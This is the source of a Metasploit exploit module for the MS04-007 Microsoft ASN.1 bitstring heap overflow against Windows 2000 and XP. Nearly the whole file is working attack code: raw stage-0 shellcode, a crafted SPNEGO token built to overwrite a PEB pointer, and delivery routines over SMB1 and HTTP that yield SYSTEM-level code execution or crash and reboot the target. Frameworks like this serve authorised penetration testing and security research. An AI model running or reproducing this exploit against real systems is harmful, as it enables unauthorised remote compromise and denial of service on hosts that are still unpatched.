GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/smb/ms04_007_killbill.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Ranked low on purpose: the 'Notes' block below declares this a one-shot
  # exploit that restarts the target OS and leaves the service down.
  Rank = LowRanking

  include Msf::Exploit::Remote::SMB::Client

  # Module metadata. The description and the 'Notes' entries
  # (UNRELIABLE_SESSION, CRASH_OS_RESTARTS, CRASH_SERVICE_DOWN) document the
  # operational impact: a failed attempt crashes LSASS and reboots the host, a
  # successful one leaves the host unable to process logons until rebooted.
  #
  # @param info [Hash] module info merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'MS04-007 Microsoft ASN.1 Library Bitstring Heap Overflow',
      'Description' => %q{
        This is an exploit for a previously undisclosed
        vulnerability in the bit string decoding code in the
        Microsoft ASN.1 library. This vulnerability is not related
        to the bit string vulnerability described in eEye advisory
        AD20040210-2. Both vulnerabilities were fixed in the
        MS04-007 patch. Windows 2000 SP4 Rollup 1 also patches this
        vulnerability.

        You are only allowed one attempt with this vulnerability. If
        the payload fails to execute, the LSASS system service will
        crash and the target system will automatically reboot itself
        in 60 seconds. If the payload succeeds, the system will no
        longer be able to process authentication requests, denying
        all attempts to login through SMB or at the console. A
        reboot is required to restore proper functioning of an
        exploited system.

        This exploit has been successfully tested with the win32/*/reverse_tcp
        payloads, however a few problems were encountered when using the
        equivalent bind payloads. Your mileage may vary.

      },
      'Author' => [ 'Solar Eclipse <solareclipse[at]phreedom.org>' ],
      'License' => BSD_LICENSE,
      'References' =>
        [
          [ 'CVE', '2003-0818'],
          [ 'OSVDB', '3902' ],
          [ 'BID', '9633'],
          [ 'MSB', 'MS04-007'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      # Code runs inside LSASS, i.e. as SYSTEM.
      'Privileged' => true,
      'Payload' =>
        {
          # Stage-1 payload budget; spnego_token enforces tag + stage1 <= 1033.
          'Space' => 1024,
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',
      'Targets' =>
        [
          [
            'Windows 2000 SP2-SP4 + Windows XP SP0-SP1', # Tested OK - 11/25/2005 hdm (bind failed)
            {
              'Platform' => 'win',
            },
          ],
        ],
      'Notes' =>
        {
          'AKA' => [ 'kill-bill' ],
          'Reliability' => [ UNRELIABLE_SESSION ],
          'Stability' => [ CRASH_OS_RESTARTS, CRASH_SERVICE_DOWN ]
        },
      'DisclosureDate' => '2004-02-10',
      'DefaultTarget' => 0))

    # PROTO selects the transport for the SPNEGO token: SMB session setup or
    # an HTTP Negotiate authorization header. OptEnum restricts it to these two.
    register_options [
      OptEnum.new('PROTO', [true, 'Which protocol to use', 'smb', %w[smb http]]),
    ]

    # The SMB path hard-codes SMB1 (connect(versions: [1]) below), so the
    # protocol-version option is removed rather than left to mislead the user.
    deregister_options('SMB::ProtocolVersion')
  end

  # This exploit is too destructive to use during automated exploitation.
  # Better Windows-based exploits exist at this time (Sep 2006)
  #
  # @return [false] always; opts this module out of automated runs
  def autofilter
    false
  end

  # This is a straight port of Solar Eclipse's "kill-bill" exploit, published
  # as a Metasploit Framework module with his permission. This module is only
  # licensed under GPLv2, keep this in mind if you embed the Framework into
  # a non-GPL application. -hdm[at]metasploit.com

  # Entry point: builds the SPNEGO token from the fixed stage-0 shellcode and
  # the encoded payload, then delivers it over the transport chosen by PROTO.
  #
  # NOTE(review): spnego_token returns nil when its length checks fail, and
  # that nil is handed to exploit_smb / exploit_http unchecked here.
  def exploit

    # The first stage shellcode fixes the PEB pointer and cleans the heap
    stage0 =
      "\x53\x56\x57\x66\x81\xec\x80\x00\x89\xe6\xe8\xed\x00\x00\x00\xff"+
      "\x36\x68\x09\x12\xd6\x63\xe8\xf7\x00\x00\x00\x89\x46\x08\xe8\xa2"+
      "\x00\x00\x00\xff\x76\x04\x68\x6b\xd0\x2b\xca\xe8\xe2\x00\x00\x00"+
      "\x89\x46\x0c\xe8\x3f\x00\x00\x00\xff\x76\x04\x68\xfa\x97\x02\x4c"+
      "\xe8\xcd\x00\x00\x00\x31\xdb\x68\x10\x04\x00\x00\x53\xff\xd0\x89"+
      "\xc3\x56\x8b\x76\x10\x89\xc7\xb9\x10\x04\x00\x00\xf3\xa4\x5e\x31"+
      "\xc0\x50\x50\x50\x53\x50\x50\xff\x56\x0c\x8b\x46\x08\x66\x81\xc4"+
      "\x80\x00\x5f\x5e\x5b\xff\xe0\x60\xe8\x23\x00\x00\x00\x8b\x44\x24"+
      "\x0c\x8d\x58\x7c\x83\x43\x3c\x05\x81\x43\x28\x00\x10\x00\x00\x81"+
      "\x63\x28\x00\xf0\xff\xff\x8b\x04\x24\x83\xc4\x14\x50\x31\xc0\xc3"+
      "\x31\xd2\x64\xff\x32\x64\x89\x22\x31\xdb\xb8\x90\x42\x90\x42\x31"+
      "\xc9\xb1\x02\x89\xdf\xf3\xaf\x74\x03\x43\xeb\xf3\x89\x7e\x10\x64"+
      "\x8f\x02\x58\x61\xc3\x60\xbf\x20\xf0\xfd\x7f\x8b\x1f\x8b\x46\x08"+
      "\x89\x07\x8b\x7f\xf8\x81\xc7\x78\x01\x00\x00\x89\xf9\x39\x19\x74"+
      "\x04\x8b\x09\xeb\xf8\x89\xfa\x39\x5a\x04\x74\x05\x8b\x52\x04\xeb"+
      "\xf6\x89\x11\x89\x4a\x04\xc6\x43\xfd\x01\x61\xc3\xa1\x0c\xf0\xfd"+
      "\x7f\x8b\x40\x1c\x8b\x58\x08\x89\x1e\x8b\x00\x8b\x40\x08\x89\x46"+
      "\x04\xc3\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea"+
      "\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x38\x49\x8b\x34\x8b\x01\xee"+
      "\x31\xff\x31\xc0\xfc\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb"+
      "\xf4\x3b\x7c\x24\x24\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b"+
      "\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc2"+
      "\x08\x00\xeb\xfe"

    token = spnego_token(stage0, payload.encoded)

    # PROTO is an OptEnum limited to smb/http, so the else branch is defensive
    # and only prints; it does not abort the module.
    case datastore['PROTO']
    when 'smb'
      exploit_smb(token)
    when 'http'
      exploit_http(token)
    else
      print_status("Invalid application protocol specified, use smb or http")
    end
  end


  # Delivers the token as the NTLMSSP/SPNEGO blob of an SMB1 session setup.
  # Whatever the outcome of the session setup, the payload handler is started
  # and the socket closed afterwards.
  #
  # @param token [String, nil] BER-encoded SPNEGO token from spnego_token
  def exploit_smb(token)
    # SMB1 only; a separate Rex SMB client is driven over the raw socket so the
    # session setup can carry an arbitrary security blob.
    connect(versions: [1])

    client = Rex::Proto::SMB::Client.new(sock)

    begin
      client.session_request(smb_hostname()) if not datastore['SMBDirect']
      client.negotiate
      client.session_setup_with_ntlmssp_blob(token)
    rescue => e
      # Error code 0x00050001 is taken as the signature of a host that has
      # already been hit once (the module's own description: one attempt only).
      if (e.to_s =~ /error code 0x00050001/)
        print_error("The target system has already been exploited")
      else
        print_error("Error: #{e}")
      end
    end

    # Runs even when the rescue branch reported an error above.
    handler
    disconnect
  end

  # Delivers the token as a base64 "Authorization: Negotiate" header in a
  # single HTTP/1.0 GET, then inspects the first response chunk for two
  # SSPI error codes. Neither match aborts: the handler still runs below.
  #
  # @param token [String, nil] BER-encoded SPNEGO token from spnego_token
  def exploit_http(token)
    connect(versions: [1])

    req = "GET / HTTP/1.0\r\n"
    req << "Host: #{ datastore['RHOST']}\r\n"
    # Second argument '' suppresses line breaks in the base64 output.
    req << "Authorization: Negotiate #{Rex::Text.encode_base64(token, '')}\r\n\r\n"

    sock.put(req)
    # get_once may return nil (no data); both checks below guard for that.
    res = sock.get_once

    if (res and res =~ /0x80090301/)
      print_error("This server does not support the Negotiate protocol or has already been exploited")
    end

    if (res and res =~ /0x80090304/)
      print_error("This server responded with error code 0x80090304 (wth?)")
    end

    handler
    disconnect
  end


  # Returns an ASN.1 encoded string
  #
  # Delegates to Rex's asn1encode, which prepends the BER length to +str+.
  #
  # @param str [String] raw contents to length-prefix
  # @return [String]
  def enc_asn1(str)
    Rex::Proto::NTLM::Utils::asn1encode(str)
  end

  # Returns an ASN.1 encoded bit string with 0 unused bits
  #
  # 0x03 is the BIT STRING tag; the leading "\x00" is the unused-bits count.
  #
  # @param str [String] bit string contents
  # @return [String]
  def enc_bits(str)
    "\x03" + enc_asn1("\x00" + str)
  end

  # Returns a BER encoded constructed bit string
  #
  # 0x23 is BIT STRING with the constructed bit set; the arguments are
  # concatenated to form its contents.
  #
  # @param str_arr [Array<String>] encoded elements to wrap
  # @return [String]
  def enc_constr(*str_arr)
    "\x23" + enc_asn1(str_arr.join(''))
  end

  # Returns a BER encoded SPNEGO token
  #
  # Wraps the malformed nested bit string in a NegTokenInit so it reaches the
  # ASN.1 library through the normal SPNEGO path. On any validation failure the
  # method prints a status line and returns nil instead of raising.
  #
  # @param stage0 [String] first-stage shellcode, at most 1032 bytes
  # @param stage1 [String] encoded payload; tag + stage1 must be <= 1033 bytes
  # @return [String, nil] the token, or nil when a check below fails
  def spnego_token(stage0, stage1)

    if !(stage0 and stage1)
      print_status("Invalid parameters passed to spnego_token")
      return
    end

    if (stage0.length > 1032)
      print_status("The stage 0 shellcode is longer than 1032 bytes")
      return
    end

    # Marker the stage-0 code searches for to locate stage 1 (the same
    # 0x42904290 pattern appears in the stage0 bytes above).
    tag = "\x90\x42\x90\x42\x90\x42\x90\x42"

    if ((tag.length + stage1.length) > 1033)
      print_status("The stage 1 shellcode is too long")
      return
    end


    # The first two overwrites must succeed, so we write to an unused location
    # in the PEB block. We don't care about the values, because after this the
    # doubly linked list of free blocks is corrupted and we get to the second
    # overwrite which is more useful.

    fw = "\xf8\x0f\x01\x00" # 0x00010ff8
    bk = "\xf8\x0f\x01"

    # The second overwrite writes the address of our shellcode into the
    # FastPebLockRoutine pointer in the PEB

    peblock = "\x20\xf0\xfd\x7f" # FastPebLockRoutine in PEB

    # Fixed-size layout: each leaf is padded to its 1024/1033/1032/1040-byte
    # slot, so the token's size does not depend on the payload length. That
    # constant structure of deeply nested constructed (0x23) bit strings is
    # what distinguishes this blob from a normal NegTokenInit mechToken.
    bitstring = enc_constr(
      enc_bits("A" * 1024),
      "\x03\x00",
      enc_constr(
        enc_bits(tag + stage1 + ("B" * (1033-(tag+stage1).length))),
        enc_constr( enc_bits(fw + bk) ),
        enc_constr(
          enc_bits("CCCC" + peblock + stage0 + ("C" * (1032-stage0.length))),
          enc_constr(
            enc_bits("\xeb\x06" + make_nops(6)),
            enc_bits("D" * 1040)
          )
        )
      )
    )

    token = "\x60" + enc_asn1( # Application Constructed Object
      "\x06\x06\x2b\x06\x01\x05\x05\x02" + # SPNEGO OID
      "\xa0" + enc_asn1( # NegTokenInit (0xa0)
        "\x30" + enc_asn1(
          "\xa1" + enc_asn1( # [1] context tag carrying the bit string
            bitstring
          )
        )
      )
    )

    return token
  end
end